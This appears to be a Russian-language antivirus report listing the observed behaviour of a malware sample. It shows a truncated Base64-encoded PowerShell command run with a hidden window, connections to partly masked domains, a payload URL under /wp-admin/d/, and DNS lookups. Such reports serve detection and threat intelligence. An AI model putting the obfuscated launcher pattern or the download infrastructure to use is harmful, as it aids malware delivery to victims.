Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABRAHAAZQA1AGsAcQBoAD0AKAAnAFoAJwArACcAdgAnACsAKAAnADkAdQBvAG4AJwArACcAdQAnACkAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAdQBTAEUAcgBQAFIATwBmAGkAbA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1504
- %TEMP%\1196777.cvr
- 'pa#####huatuananh.com':80
- 'pa#####huatuananh.com':443
- 'ne##ia.net':80
- 'ta##idz.id':443
- 'er###iary.tw':443
- http://pa#####huatuananh.com/wp-admin/d/
- 'pa#####huatuananh.com':443
- 'ta##idz.id':443
- 'er###iary.tw':443
- DNS ASK cc#####ssuracademy.com
- DNS ASK be####hbuilder.com
- DNS ASK pa#####huatuananh.com
- DNS ASK ne##ia.net
- DNS ASK ta##idz.id
- DNS ASK er###iary.tw
- DNS ASK cp##.xyz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABRAHAAZQA1AGsAcQBoAD0AKAAnAFoAJwArACcAdgAnACsAKAAnADkAdQBvAG4AJwArACcAdQAnACkAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAdQBTAEUAcgBQAFIATwBmAGkAbA...' (со скрытым окном)